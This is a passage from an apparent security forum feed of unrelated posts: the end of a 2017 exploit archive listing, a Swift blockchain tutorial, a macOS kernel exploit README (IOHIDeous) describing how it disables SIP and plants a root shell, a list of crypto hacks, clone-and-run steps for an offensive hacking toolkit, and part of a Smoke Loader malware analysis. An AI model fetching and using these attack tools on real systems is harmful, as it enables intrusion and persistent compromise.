AM 1,058 fssc10-sql.txt 12/06/2017 11:11 AM 1,295 fsshaadiclone-sql.txt 12/08/2017 06:20 AM 1,046 fsshutterstockclone10-sql.txt 12/08/2017 05:22 AM 1,354 fsthumbtackclone10-sql.txt 12/11/2017 03:53 PM 1,489 fstrademeclone10-sql.txt 12/20/2017 02:11 AM 5,321 genexis-disclose.txt 12/23/2017 06:34 PM 1,752 getgodm5302712-overflow.txt 12/28/2017 05:02 AM 1,340 goodtraveltl1-xss.txt 12/12/2017 06:00 AM 960 grouponclone301state-sql.txt 12/12/2017 06:13 AM 2,537 GS20171212051320.tgz 12/12/2017 06:14 AM 1,697 GS20171212051449.tgz 12/12/2017 06:15 AM 1,191 GS20171212051547.tgz 12/12/2017 06:17 AM 1,425 GS20171212051727.tgz 12/12/2017 06:18 AM 3,183 GS20171212051854.tgz 12/12/2017 06:21 AM 3,487 GS20171212052017.txt 12/12/2017 06:22 AM 5,715 GS20171212052204.txt 12/12/2017 06:23 AM 2,137 GS20171212052309.tgz 12/15/2017 02:33 PM 1,876 GS20171215170737.tgz 12/17/2017 04:36 PM 1,933 GS20171217153621.tgz 12/17/2017 04:37 PM 1,978 GS20171217153732.tgz 12/18/2017 02:33 PM 7,956 GS20171219054721.txt 12/18/2017 04:55 PM 10,881 GS20171219054843.txt 12/18/2017 10:32 AM 8,057 GS20171219054935.txt 12/18/2017 06:22 PM 7,973 GS20171219055055.txt 12/19/2017 02:11 AM 5,247 GS20171219055214.txt 12/19/2017 02:11 AM 7,049 GS20171219055336.txt 12/19/2017 03:22 PM 3,959 GS20171219142231.tgz 12/20/2017 05:05 PM 2,398 GS20171220160535.tgz 12/22/2017 05:31 PM 7,657 GS20171222163122.tgz 12/11/2017 04:36 PM 1,442 hotscriptsclone31-sql.txt 12/02/2017 04:33 AM 1,672 hpimcplat72-exec.txt 12/28/2017 05:05 AM 5,842 hp_insight_control_vmware_vcenter.txt 12/30/2017 04:51 PM 3,459 hp_loadrunner_magentproc_cmdexec.rb.txt 12/19/2017 08:22 PM 249,898 huaweip8-overflow.pdf 12/06/2017 04:44 PM 4,747 hvvf500-escalate.txt 12/06/2017 05:44 AM 2,877 hvvf501-escalate.txt 12/06/2017 06:55 AM 4,474 hvvf503-escalate.txt 12/06/2017 02:11 AM 5,792 icmic51116-escalate.txt 12/15/2017 05:44 AM 1,658 itguardmanager0001-exec.txt 12/19/2017 06:46 AM 4,093 jenkins_xstream_deserialize.rb.txt 12/02/2017 04:22 AM 1,232 jobs2careerscoroflot-sql.txt 12/13/2017 03:22 AM 1,173 joomlabulldozer141-sql.txt 12/18/2017 09:22 AM 803 joomlagurupropromocode-sql.txt 12/22/2017 05:29 PM 1,796 joomlajbbus230-sql.txt 12/22/2017 05:30 PM 2,181 joomlajbtourbooking222-sql.txt 12/19/2017 06:45 AM 985 joomlajbvisa10-sql.txt 12/29/2017 03:31 PM 796 joomlajextnfaq400-sql.txt 12/31/2017 11:22 PM 731 joomlajextngroupbuy400-xss.txt 12/31/2017 09:22 PM 1,133 joomlajextnmembership310-sql.txt 12/15/2017 05:44 PM 1,507 joomlajextnqa310-sql.txt 12/15/2017 05:44 PM 993 joomlajextnvg305-sql.txt 12/30/2017 04:37 PM 1,201 joomlajomestatepro37-sql.txt 12/30/2017 04:38 PM 1,160 joomlajomevents37-sql.txt 12/30/2017 04:39 PM 1,363 joomlajomholiday40-sql.txt 12/30/2017 04:35 PM 1,151 joomlajtagmd537-sql.txt 12/30/2017 04:40 PM 1,022 joomlajtagminicart410-sql.txt 12/18/2017 11:11 AM 959 joomlamyprojects20-sql.txt 12/19/2017 03:30 PM 1,076 joomlanextgeneditor210-sql.txt 12/30/2017 04:33 PM 838 joomlaspmoviedb14-sql.txt 12/18/2017 12:11 PM 982 joomlauserbench10-sql.txt 12/30/2017 04:42 PM 909 joomlavarista29-sql.txt 12/26/2017 11:44 AM 1,201 joomlayjk2105-sql.txt 12/26/2017 08:32 PM 1,201 joomlayjlivesearch20-sql.txt 12/27/2017 05:22 PM 1,104 joomlayoubumpit20-sql.txt 12/15/2017 05:36 PM 4,546 kemplb-bypass.txt 12/11/2017 04:37 PM 622 kickstarterclonescript20-sql.txt 12/23/2017 06:29 PM 1,194 kisiselportfolyo4031-sql.txt 12/23/2017 06:31 PM 1,198 kurumsalfirma2-sql.txt 12/08/2017 10:32 AM 5,097 labfnfsaxeftp37-overflow.txt 12/07/2017 08:35 AM 3,005 lacie5bignetwork228-exec.txt 12/11/2017 04:40 PM 1,156 laundrybooking10-sql.txt 12/11/2017 04:39 PM 1,156 laundrybookingscript10-sql.txt 12/11/2017 04:41 PM 1,125 lawyersearchscript11-sql.txt 12/27/2017 02:11 AM 1,306 librarycms1-xss.txt 12/12/2017 06:11 AM 13,435 libtiffpal2rgb-dos.tgz 12/07/2017 01:01 AM 3,589 lkdccpsocket-uaf.txt 12/27/2017 05:44 AM 1,306 locationsmpcmsdir1-xss.txt 12/07/2017 05:22 AM 1,142 macoscron-escalate.txt 12/13/2017 05:58 PM 680 meinberglantime6-bypass.txt 12/13/2017 05:55 PM 1,024 meinberglantime6-fileread.txt 12/13/2017 05:57 PM 917 meinberglantime6-upload.txt 12/12/2017 01:13 PM 2,154 mikrotik6405-dos.tgz 12/12/2017 01:12 PM 1,323 mikrotikdns-dos.tgz 12/01/2017 07:32 PM 2,703 MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt 12/12/2017 05:57 AM 1,350 mlmfmps204-sql.txt 12/12/2017 05:58 AM 928 mlmforcedmatrix209-sql.txt 12/12/2017 05:55 AM 1,649 mmtbs315-sql.txt 12/17/2017 04:18 PM 2,029 monstracms304-shell.txt 12/15/2017 05:57 PM 4,504 movieguide20-sql.txt 12/12/2017 05:52 AM 1,089 multireligionrm472-sql.txt 12/12/2017 05:48 AM 1,050 multivendorpac10-sql.txt 12/06/2017 09:22 AM 2,451 murus1411-escalate.txt 12/12/2017 06:00 AM 1,002 muslimms302-sql.txt 12/11/2017 04:40 PM 1,050 mvpacs10-sql.txt 12/22/2017 05:36 PM 3,295 mysql_udf_payload.rb.txt 12/10/2017 11:00 PM 967 nearbuyclone32-sql.txt 12/21/2017 02:11 AM 1,050 netiswf2419-inject.txt 12/28/2017 06:02 PM 4,535 nettransportdm296L-overflow.txt 12/28/2017 04:55 PM 1,232 netwinsurgeftp23f2-xss.txt 12/24/2017 01:44 AM 1,140 newsphp1031-sql.txt 12/17/2017 04:33 AM 2,412 nsdbinary-format.txt 12/14/2017 02:11 AM 6,072 office_dde_delivery.rb.txt 12/06/2017 01:03 AM 19,293 office_ms17_11882.rb.txt 12/22/2017 05:24 PM 1,573 ohbsp13-xss.txt 12/11/2017 04:40 PM 1,629 onlineexamtas16-sql.txt 12/12/2017 05:48 AM 1,629 onlineexamtestappscript16-sql.txt 12/12/2017 05:49 AM 1,120 opensourceclassifiedsads32-sql.txt 12/27/2017 05:02 AM 1,102 openupload042-rfi.txt 12/27/2017 06:02 AM 1,245 openupload042-xss.txt 12/27/2017 06:02 AM 1,205 openupload3628-xss.txt 12/15/2017 05:48 PM 2,250 paidtoread205-sql.txt 12/13/2017 06:13 PM 8,797 pan-exec.txt 12/19/2017 04:22 PM 11,125 pan-inject.txt 12/13/2017 06:27 PM 5,202 pfsense_clickjacking.rb.txt 12/29/2017 12:50 AM 6,123 pfsense_graph_injection_exec.rb.txt 12/31/2017 05:44 AM 1,359 photofusion1-xss.txt 12/22/2017 05:25 PM 1,305 phpmars109-xss.txt 12/31/2017 04:32 PM 753 phpmelody271-sql.txt 12/12/2017 05:50 AM 1,364 phpmultive10-sql.txt 12/27/2017 03:22 AM 1,181 phpwebstat4-disclose.txt 12/27/2017 06:02 AM 1,091 phpwebstat4503-backdoor.txt 12/27/2017 05:02 AM 1,088 phpwebstat4503-disclose.txt 12/27/2017 06:02 AM 1,254 phpwebstat4503-xss.txt 12/15/2017 05:56 PM 1,250 piwigo291-sql.txt 12/06/2017 01:34 AM 5,455 polycom_hdx_traceroute_exec.rb.txt 12/12/2017 05:50 AM 1,144 profservice10-sql.txt 12/06/2017 11:22 AM 3,002 proxifierformac219-escalate.txt 12/27/2017 06:55 AM 17,826 PS4-4.05-Kernel-Exploit.tgz 12/13/2017 06:03 PM 22,457 QSA-20171211.txt 12/24/2017 05:22 PM 4,081 RCESEC-2017-003.txt 12/08/2017 04:33 AM 1,343 rcs272-sql.txt 12/12/2017 05:51 AM 1,438 readymadeclassified33-sql.txt 12/06/2017 05:02 AM 3,002 readymadeclassifieds10-sql.txt 12/15/2017 05:46 PM 743 readymadevss32-xss.txt 12/12/2017 05:54 AM 1,329 remtbs321-sql.txt 12/12/2017 05:52 AM 978 responsiverealestate32-sql.txt 12/12/2017 06:01 AM 826 resumeclone205-sql.txt 12/12/2017 05:52 AM 1,207 rmvss32-sql.txt 12/22/2017 05:26 PM 1,394 rrelcrwa10-xss.txt 12/04/2017 01:38 AM 5,250 SA-20171129-0.txt 12/04/2017 01:42 AM 10,422 SA-20171130-0.txt 12/04/2017 01:45 AM 7,440 SA-20171130-1.txt 12/13/2017 06:16 PM 7,468 SA-20171213-0.txt 12/25/2017 02:33 PM 2,035 samsungbrowser-sopbypassuxss.txt 12/20/2017 05:08 PM 4,339 samsunginternetbrowser-sopbypass.rb.txt 12/08/2017 03:22 AM 771 scs100-upload.txt 12/11/2017 04:38 PM 1,124 secureecomscript201-sql.txt 12/25/2017 05:33 AM 1,027 seditiocms172-sql.txt 12/25/2017 06:22 AM 1,011 seditiocms175-sql.txt 12/26/2017 05:44 AM 6,378 sendroid650-sql.txt 12/26/2017 10:32 AM 1,352 silverstripcms362-inject.txt 12/01/2017 04:02 PM 4,490 socusoftphoto2vc-overflow.txt 12/12/2017 05:55 AM 889 stbs321-sql.txt 12/27/2017 05:02 AM 1,076 swamp002-rfi.txt 12/15/2017 05:43 PM 2,505 syncbreeze10212-dos.txt 12/27/2017 05:02 AM 1,073 sysgaugeserver3618-dos.txt 12/10/2017 10:53 PM 2,980 teamcity201715-escalate.txt 12/20/2017 02:35 AM 5,275 tplinktlsg108e-xssaccess.txt 12/28/2017 04:33 AM 1,320 tripbuddytle1-xss.txt 12/06/2017 03:22 AM 1,495 ttmp10-sql.txt 12/19/2017 06:46 AM 6,202 tuleap_rest_unserialize_exec.rb.txt 12/12/2017 06:05 AM 1,081 vanguard14-sql.txt 12/12/2017 06:03 AM 1,424 vanguard14-upload.txt 12/05/2017 07:32 PM 300,860 vb-mitm.pdf 12/24/2017 06:00 PM 7,122 vitek-execdisclose.txt 12/06/2017 12:11 PM 2,682 vxsearch10214-overflow.txt 12/09/2017 02:11 AM 1,361 wam205-sql.txt 12/30/2017 04:43 PM 1,322 wbizdesk10-xss.txt 12/15/2017 06:12 PM 3,848 wd_mycloud_multiupload_upload.rb.txt 12/31/2017 04:33 AM 1,297 wikipediase1-xss.txt 12/03/2017 06:02 PM 1,197 winducms31-disclose.txt 12/26/2017 08:32 PM 1,391 wmp-disclose.txt 12/05/2017 11:10 AM 766 wp3rdpartyinjectresults02-xss.txt 12/18/2017 07:22 AM 5,270 wpclockworksms-xss.txt 12/20/2017 02:40 AM 2,340 wpconcours-xss.txt 12/07/2017 08:22 PM 1,153 wpcrowdideas10-xss.txt 12/20/2017 02:43 AM 2,488 wpcsvimportexport-xss.txt 12/20/2017 02:41 AM 2,369 wpcustommap11-xss.txt 12/21/2017 06:00 PM 1,331 wpfeedstat41-redirect.txt 12/21/2017 11:11 AM 615 wpgrifus401-xss.txt 12/19/2017 03:03 PM 736 wpitinerary100-xss.txt 12/05/2017 06:02 PM 740 wpmailster1540-xss.txt 12/14/2017 01:49 AM 1,031 wpmobile203-xss.txt 12/15/2017 05:34 PM 748 wppinterestbadge180-xss.txt 12/17/2017 04:34 PM 724 wpplacemarks200-xss.txt 12/14/2017 01:47 AM 850 wpqiniucloudtuchuang18-xss.txt 12/17/2017 04:32 PM 820 wpsafepaysgwc107-xss.txt 12/18/2017 04:33 AM 733 wpsharethisimage103-xss.txt 12/05/2017 09:32 PM 1,256 wpsmsmsnf111-xss.txt 12/05/2017 12:01 PM 1,467 wpssccss12-xss.txt 12/14/2017 01:52 AM 850 wpwoopayinicis113-xss.txt 12/15/2017 05:38 PM 764 wpwunderbarbasic113-xss.txt 12/18/2017 05:44 AM 795 wpyghe037-xss.txt 12/05/2017 03:02 PM 731 wpzurlpreview161-xss.txt 12/07/2017 03:22 AM 5,985 wscipsafetydissector-crash.tgz 12/11/2017 04:35 PM 1,123 yogaclassscript10-sql.txt 12/13/2017 05:50 PM 2,467 zivif-bypassexecpassword.txt 12/28/2017 04:55 PM 5,181 ZSL-2017-5442.txt 12/27/2017 06:55 AM 1,532 ZSL-2017-5443.txt 12/27/2017 12:11 PM 1,691 ZSL-2017-5444.txt 12/27/2017 06:55 AM 2,589 ZSL-2017-5445.txt 12/28/2017 07:32 PM 4,163 ZSL-2017-5447.txt 12/26/2017 05:44 AM 5,027 zyxelttl-dos.txt 286 File(s) 2,166,304 bytes Total Files Listed: 2660 File(s) 1,292,047,082 bytes 38 Dir(s) 123,587,506,176 bytes free Download: 2017-exploits.tgz (1.2 GB) Source: https://packetstormsecurity.com/files/145601/Packet-Storm-New-Exploits-For-2017.html
  9. In my last post I discussed the basic implementation of Blockchain in Swift language. In this post I will take the Blockchain implementation to the cloud using server side Swift framework, Vapor. We will build the Blockchain Web API over the HTTP protocols, providing necessary functionality using different routes. This post assumes that you have installed Vapor framework on your computer and have basic knowledge of Swift Language. Implementing Models The first step is to create necessary models for the Blockchain Web API. These models will consist of the following. Block: A block class represents a single block which can contain inputs and outputs represented by transactions. class Block : Codable { var index :Int = 0 var dateCreated :String var previousHash :String! var hash :String! var nonce :Int var message :String = "" private (set) var transactions :[Transaction] = [Transaction]() var key :String { get { let transactionsData = try! JSONEncoder().encode(self.transactions) let transactionsJSONString = String(data: transactionsData, encoding: .utf8) return String(self.index) + self.dateCreated + self.previousHash + transactionsJSONString! + String(self.nonce) } } func addTransaction(transaction :Transaction) { self.transactions.append(transaction) } init() { self.dateCreated = Date().toString() self.nonce = 0 self.message = "Mined a New Block" } init(transaction :Transaction) { self.dateCreated = Date().toString() self.nonce = 0 self.addTransaction(transaction: transaction) } } The properties of Block class are explained below: index — The position of block in the blockchain. Index of 0 means that the block is the first block in the blockchain. Index of 1 means it is the second block in the blockchain.. you get the idea right! dateCreated — The date when the block was created previousHash — The hash value of the previous block hash — The current hash of the block message — Memo attached to each block. This is just for our purposes nonce — Auto incremented number which plays an important role for mining the hash transactions — An array of transactions. Each transaction represents a transfer of goods/value key — This is a computed property which is passed to the hashed function Transaction: Transaction consists of the sender, recipient and the amount being transferred. The implementation is shown below: class Transaction :Codable { var from :String var to :String var amount :Double init(from :String, to :String, amount :Double) { self.from = from self.to = to self.amount = amount } init?(request :Request) { guard let from = request.data["from"]?.string, let to = request.data["to"]?.string, let amount = request.data["amount"]?.double else { return nil } self.from = from self.to = to self.amount = amount } } The Transaction class is self explanatory. It consists of from, to and amount fields. For the sake of simplicity we will be using dummy names for from and to fields, in reality these fields will consist of wallet ID. Blockchain: Blockchain is the main class which represents a list of blocks. Each block points back to the previous block in the chain. Each block can contain multiple transactions, representing the credit or debit. class Blockchain : Codable { var blocks :[Block] = [Block]() init() { } init(_ genesisBlock :Block) { self.addBlock(genesisBlock) } func addBlock(_ block :Block) { if self.blocks.isEmpty { // add the genesis block // no previous has was found for the first block block.previousHash = "0" } else { let previousBlock = getPreviousBlock() block.previousHash = previousBlock.hash block.index = self.blocks.count } block.hash = generateHash(for: block) self.blocks.append(block) block.message = "Block added to the Blockchain" } private func getPreviousBlock() -> Block { return self.blocks[self.blocks.count - 1] } private func displayBlock(_ block :Block) { print("------ Block \(block.index) ---------") print("Date Created : \(block.dateCreated) ") //print("Data : \(block.data) ") print("Nonce : \(block.nonce) ") print("Previous Hash : \(block.previousHash!) ") print("Hash : \(block.hash!) ") } private func generateHash(for block: Block) -> String { var hash = block.key.sha256()! // setting the proof of work. // In "00" is good to start since "0000" will take forever and Playground will eventually crash :) while(!hash.hasPrefix(DIFFICULTY)) { block.nonce += 1 hash = block.key.sha256()! print(hash) } return hash } } Each model adheres to the Codable protocol which allows it to easily convert to JSON represented object. If you have followed the last article then the implementation above is very similar. Next step is to configure routes for our Web API, this is implemented in the new section using the Vapor framework. Implementing Web API Using Vapor There are several different ways of implementing the Web API using Vapor. Instead of adding all the code in the Routes class, I proceeded by adding a custom controller which will handle all Blockchain requests. The implementation of BlockchainController is shown below: class BlockchainController { private (set) var drop :Droplet private (set) var blockchainService :BlockchainService! init(drop :Droplet) { self.drop = drop self.blockchainService = BlockchainService() // setup the routes for the controller setupRoutes() } private func setupRoutes() { self.drop.get("mine") { request in let block = Block() self.blockchainService.addBlock(block) return try JSONEncoder().encode(block) } // adding a new transaction self.drop.post("transaction") { request in if let transaction = Transaction(request: request) { // add the transaction to the block // get the last mined block let block = self.blockchainService.getLastBlock() block.addTransaction(transaction: transaction) //let block = Block(transaction: transaction) //self.blockchainService.addBlock(block) return try JSONEncoder().encode(block) } return try JSONEncoder().encode(["message":"Something bad happend!"]) } // get the chain self.drop.get("blockchain") { request in if let blockchain = self.blockchainService.getBlockchain() { return try JSONEncoder().encode(blockchain) } return try! JSONEncoder().encode(["message":"Blockchain is not initialized. Please mine a block"]) } } } We will start by three basic endpoints for the Web API. Mining: This endpoint will initiate the mining proess. Mining will allow us to satisfy the proof of work and add the block to the Blockchain. Transaction: This endpoint is used to add a new transaction. The transaction will contain information about sender, receiver and the amount. Blockchain: This endpoint returns the complete blockchain. The BlockchainController uses the BlockChainService to perform the required operations. The implementation of BlockChainService is shown below: // // BlockchainService.swift // Run // // Created by Mohammad Azam on 12/25/17. // import Foundation import Vapor class BlockchainService { typealias JSONDictionary = [String:String] private var blockchain :Blockchain = Blockchain() init() { } func addBlock(_ block :Block) { self.blockchain.addBlock(block) } func registerNode(_ blockchainNode :BlockchainNode) { self.blockchain.addNode(blockchainNode) } func getLastBlock() -> Block { return self.blockchain.blocks.last! } func getBlockchain() -> Blockchain? { return self.blockchain } } Let’s go ahead and check out out Web API end points. Start the Vapor server and send a request to “mine” end point. Mining a New Block The proof of work algorithm generates a hash value starting with “000”. Once, the block has been mined we return it by converting it into JSON format. This is performed by using the Swift 4.0 Codable Protocols. Now, we can add our transaction to the blockchain. Here is a simple transaction which transfers $10 from Alex to Mary. New Transaction The final step is to check out our blockchain with the newly added block. Visit the endpoint “blockchain” to view the complete chain. Blockchain Hooray! Our Blockchain Web API is now working correctly. Unfortunately, the whole point of blockchain is to be decentralized and currently, we don’t have any mechanism to add new nodes. In the next section we are going to update our blockchain implementation so it can support multiple nodes. Adding Nodes to Blockchain Before allows the blockchain to add new nodes, we must define what a node looks like. The implementation of a node model is shown below: class BlockchainNode :Codable { var address :String init(address :String) { self.address = address } init?(request :Request) { guard let address = request.data["address"]?.string else { return nil } self.address = address } } The BlockChainNode class simply consists of an address property which represents the URL of the node server. We update the BlockchainController to add the ability to register new nodes. This is shown below: self.drop.post("nodes/register") { request in guard let blockchainNode = BlockchainNode(request :request) else { return try JSONEncoder().encode(["message":"Error registering node"]) } self.blockchainService.registerNode(blockchainNode) return try JSONEncoder().encode(blockchainNode) } The BlockchainService also gets updated to accommodate registering of the new nodes. func getNodes() -> [BlockchainNode] { return self.blockchain.nodes } func registerNode(_ blockchainNode :BlockchainNode) { self.blockchain.addNode(blockchainNode) } Let’s go ahead and test it out. Start the new Vapor server and try to register new nodes. Register a New Node Once, the node(s) has been registered, you can fetch it using the nodes end point as shown below: Fetching All Nodes Now, that we can register new nodes we should focus on resolving the conflicts between the nodes. A conflict happens when the blockchain on one node gets larger as compared to the other nodes. In this scenario, we always takes the neighboring nodes and updates them with the larger blockchain. Resolving Conflicts Between Nodes In order to create a conflict we need to run a second server or run the server on a separate port. We are going to use the later approach and start the Vapor server on a different port. Once, the two nodes are initiated, we will create transactions on both nodes which will add blocks to the blockchain. Finally, we will call a resolve end point which will resolve the conflicts between nodes and update the node to the larger blockchain. The BlockchainController has been updated to add a new end point for resolving conflicts. self.drop.get("nodes/resolve") { request in return try Response.async { portal in self.blockchainService.resolve { blockchain in let blockchain = try! JSONEncoder().encode(blockchain) portal.close(with: blockchain.makeResponse()) } } } We have used the async response feature of Vapor framework which will allow us to process the response asyncronously. The BlockchainService has also been updated to support the conflict resolution. The implementation is shown below: func resolve(completion :@escaping (Blockchain) -> ()) { // get the nodes let nodes = self.blockchain.nodes for node in nodes { let url = URL(string :"http://\(node.address)/blockchain")! URLSession.shared.dataTask(with: url) { data, _, _ in if let data = data { let blockchain = try! JSONDecoder().decode(Blockchain.self, from: data) if self.blockchain.blocks.count > blockchain.blocks.count { completion(self.blockchain) } else { self.blockchain.blocks = blockchain.blocks completion(blockchain) } } }.resume() } } The resolve function goes through a list of nodes and fetches the blockchain of each node. If the blockchain is larger than the current blockchain then it replaces the blockchain with the larger one, otherwise it returns the current blockchain which is also the larger one. In order to test it out let’s start two servers on separate port and add two transactions on port 8080 and three on 8090. You can start a Vapor server using terminal by issuing the following command. vapor run serve -— port=8090 We added three transactions on port 8080 node as shown below: Blockchain on Port 8080 After that we added two transactions on port 8090 node as shown below: Blockchain on Port 8090 Make sure to register the node with the 8090 address as shown below: Registering a Node Finally, it is time to test our resolve conflict end point. Invoke the “resolve” end point by visiting it in your Postman as shown below: Resolve End Point Returning Larger Blockchain As you can see the resolve end point returns the larger blockchain and also updates the blockchain for the other nodes. This completes our conflict resolution scenario. [Github] This post is based on an amazing post by Daniel Van Flymen “Learn Blockchains by Building One”. I hope you like the post. I am currently in the process of making a Udemy course on “Blockchain Programming in iOS”. You can subscribe here to get notified when the course is released. If you want to support my writing and donate then please visit my courses page and buy my amazing courses on Udemy. Thanks and happy programming! Source: https://hackernoon.com/building-blockchain-web-api-using-swift-and-vapor-2daf599c8449
  10. da

    ce site era?
  11. IOHIDFamily 0day

    IOHIDeous A macOS kernel exploit based on an IOHIDFamily 0day. Write-up here. Notice The prefetch timing attack I'm using for hid for some reason doesn't work on High Sierra 10.13.2 anymore, and I don't feel like investigating that. Maybe patched, maybe just the consequence of a random change, I neither know nor care. The vuln is still there and my code does both info leak and kernel r/w, just not in the same binary - reason is explained in the write-up. If you want that feature, consider it an exercise for the reader. Usage The exploit consists of three parts: poc panics the kernel to demonstrate the present of a memory corruption, should work on all macOS versions. leak leaks the kernel slide, could be adapted to other versions but as-is works only on High Sierra. hid achieves full kernel r/w, tested only on Sierra and High Sierra (up to & including 10.13.1), might work on earlier versions too. poc and leak need to be run as the user that is currently logged in via the GUI, and they log you out in order to perform the exploit. hid on the other hand, gives you four options for a first argument: steal requires to be run as root and SIP to be disabled, but leaves you logged in the entire time. kill requires root and forces a dirty logout by killing WindowServer. logout if executed as root or the currently logged in user, logs you out via launchctl. Otherwise tries to log you out via AppleScript, and then falls back to wait. wait simply waits for a logout, shutdown or reboot to occur. Additionally you can specify a second argument persist. If given, hid will permanently disable SIP and AMFI, and install a root shell in /System/pwned. leak and hid should be run either via SSH or from a screen session, if you wish to observe their output. Building Should all be self-explanatory: make all make poc make leak make hid make clean Download: IOHIDeous-master.zip git clone https://github.com/Siguza/IOHIDeous.git Source: https://github.com/Siguza/IOHIDeous/
  12. Hard forks? Soft forks? ICOs? Bombarded by no shortage of unfamiliar technical terms in 2017, consumers in the blockchain sector once again proved a ripe target for hackers and criminals. But, not all hacks and scams were created equal. Some rose above the froth – either due to their size or impact – as well as what they said about the state of blockchain technology and the industry itself. Still, the impacts of these incidents were far from academic. Whether it was a simple wallet hack, fraudulent ICO or a bug in a piece of software code, investors lost millions, with nearly $490 million taken in the incidents below. So far, none of the perpetrators of these crimes has been caught or even identified, and it's questionable whether most of these funds can be found or returned. 1. CoinDash ICO Hack Payment and shipment startup CoinDash launched an initial coin offering (ICO) campaign early this summer, but it quickly had to pump the brakes after its ethereum address was compromised. The startup raised $7.3 million before a hacker changed the address, causing donations to go to an unknown party. The company shut down the ICO, but promised to send its native token award, CDT, to those who attempted to donate. While the company stated that donations sent after it had released its statement would not be honored, some investors continued to show support by donating to the hacked address, inadvertently raising the amount of stolen funds from $7 million to $10 million at the time. All in all, the incident showcases the growing pains experienced by ICOs, which despite raising massive amounts of funds, still had to navigate the complexities of an early-stage technology. 2. Parity Wallet Breach It was a tough year for cryptocurrency wallet provider Parity, which has the rare distinction of being cited twice on our year-end list. Issues began in July when the U.K.-based startup discovered a vulnerability in version 1.5 of its wallet software, resulting in at least 150,000 ethers being stolen from user accounts. The bug was found in its multi-signature wallets, compromising several companies’ ICO fundraisers. At the time, the ethers were worth roughly $30 million, but they're worth closer to $105 million as of mid-December. The issue was deemed "critical," with the company's CTO, Gavin Wood, announcing at least three compromised addresses and saying efforts were being made to prevent further loss of funds. It was later found that more than 70,000 ethers were already cashed out or otherwise redeemed in some way, ensuring that their loss was permanent. 3. Enigma Project Scam Back in ICO-land, issues weren't limited to compromised addresses. Blockchain startup Enigma saw its website, mailing lists and an administrator account on its Slack channel compromised when fraudsters launched a fake token pre-sale in August, defrauding potential investors of more than 1,500 ethers. The hijacked accounts promised a large return on investment, and masquerading as the genuine operators of the project, those behind the effort were able to convince unsuspecting consumers to donate to the compromised website. While the team behind Enigma was able to recover control of the company’s accounts, the ether wallet used by the hacker was emptied, and the funds were not recovered. 4. Parity Wallet Freeze Perhaps the year's biggest security incident, this entry on the list is also distinguished by being one the few to take place without the apparent aid of a malicious party. Occurring suddenly this November, a Parity user accidentally found a bug in the software code, freezing more than $275 million in ether in the wallet’s second major incident of 2017. One of two widely used clients for ethereum, the miscue effectively called into question what was and is a central infrastructure component of the network, prompting some to doubt the company's offerings and renewing criticisms of ethereum itself. In subsequent updates, developers have pushed to restore the funds, though it's now believed that doing so would require all ethereum users to upgrade their software. 5. Tether Token Hack In another incident notable for its unresolved controversies, more than $30 million was stolen from the U.S. dollar-pegged cryptocurrency Tether in late November. At the time, Tether claimed that roughly $31 million’ worth of tokens were taken from their virtual treasury and sent to an unknown bitcoin address. Not a significant number in the cryptocurrency economy, the hack was more relevant as it effectively renewed long-standing criticisms of Tether the company, prompting scrutiny in the form of blog posts and mainstream news exposes. The company later moved to blacklist the tokens stolen through an update to the Omni protocol, the blockchain on which it is based. Still, Tether continues to be dogged by allegations the incident played no small part in stirring up. 6. Bitcoin Gold Scam Think forks were confusing? So did scammers, and those seeking to cash out new tokens awarded in blockchain splits often proved all too easy to target. Shortly after the launch of a bitcoin fork called bitcoin gold, for example, some bitcoin users had their cryptocurrency wallets drained after using a service seemingly endorsed by the project's development team. Marketed as a way to authenticate whether a user was eligible for bitcoin gold funds (effectively free money for bitcoin owners), the website’s operators instead stole more than $3 million in bitcoin, bitcoin gold, ethereum and litecoin. Bitcoin gold’s development team claimed no formal relationship with the website’s developer, arguing he reached out offering to build a wallet checking service and offering to make his code open-source. The site’s developer initially claimed the site was hacked, but later wiped his GitHub and ceased responding to users on the fork’s Slack channel. Overall, though, it was another case of consumers falling into traps over promises of free funds. 7. NiceHash Market Breach That's not to say that long-standing companies were spared by the year's attacks. This was the case when cryptocurrency mining marketplace NiceHash, a well-known marketplace for mining power, reported being hacked early in December, later confirming that about 4,700 in bitcoin was stolen. At the time, that was worth approximately $78 million. It was later revealed an employee’s computer was compromised, allowing the perpetrator to gain access to the marketplace’s systems and remove bitcoin from the company’s accounts. NiceHash CEO Marko Kobal later announced that his team was trying to determine how the hack occurred, but that it would take time to establish what happened. Disclosure: CoinDesk is a subsidiary of Digital Currency Group, which has an ownership stake in Enigma. Various images courtesy Shutterstock Via coindesk.com
  13. La multi ani(?)

    La multi ani, PS: am GMT-ul diferit.
  14. Fsociety Hacking Tools Pack – A Penetration Testing Framework A Penetration Testing Framework , you will have evry script that a hacker needs Fsociety Contains All Tools Used In Mr Robot Series Menu: Information Gathering Password Attacks Wireless Testing Exploitation Tools Sniffing & Spoofing Web Hacking Private Web Hacking Post Exploitation INSTALL & UPDATE Installation Linux: git clone https://github.com/Manisso/fsociety.git cd fsociety && python fsociety.py [◉] 0 : INSTALL & UPDATE [◉] -> 0 [✓] press 0 [✓] Congratulation Fsociety is Installed ! Installation Windows: [✔] Download python [✓] Download fsociety [✓] Extract fsociety into Desktop [◉]Open CMD and type the following commands: cd Desktop/fsociety-master/ python fsociety.py Usage: https://asciinema.org/a/URj2nvpbYpeJyJe43KlASZ7fz Source: https://github.com/Manisso/fsociety
  15. Who's Online?!

    Salut, stiu ca in trecut pe vBulletin a fost scos plugin-ul Who's Online - see full list, ca idee... cand se trimite un link de pe forum din '74, se poate vedea ce user are victima in (See full list) in cazul in care nu este logat ca anonim, in concluzie se poate scoate (see full list)? sau nu va deranjeaza, mie unul imi provoaca paranoia, ar fi mai discret sa ramana doar 'Who's Online'. Succes, sarbatori fericite!
  16. Exploit kits are constantly serving up a variety of exploits and payloads to systems across the Internet on a daily basis. In order to prevent their payloads from being easily mitigated, they typically contain many layers of obfuscation and anti-analysis checks. The authors understand that many eyes will have access to their malware and they often put a shell around the final payload to defend against malware analysis, sandbox analysis, and antivirus protection. Smoke Loader is one such shell that uses a Nullsoft script installer package to deploy the initial malware payload. Below are the details of how Smoke Loader infects the system, attempts to evade analysis, and persist on the system. Executive Summary Exploit kits authors make their money by being able to sell the use of their system to many different buyers. In order to do that, they need to be able to protect their final payloads from being easily reversed and defended against. Smoke Loader is a shell that protects the final payload by using multiple layers of injection and hollowing to make analysis difficult. In addition to these layers, they also have active defenses that look for indications that they are running in a virtual machine or being actively analyzed by known security tools. If any of these tools are found they will terminate them to prevent their secrets from being discovered. Once fully installed on the system, Smoke Loader will contact the Command and Control 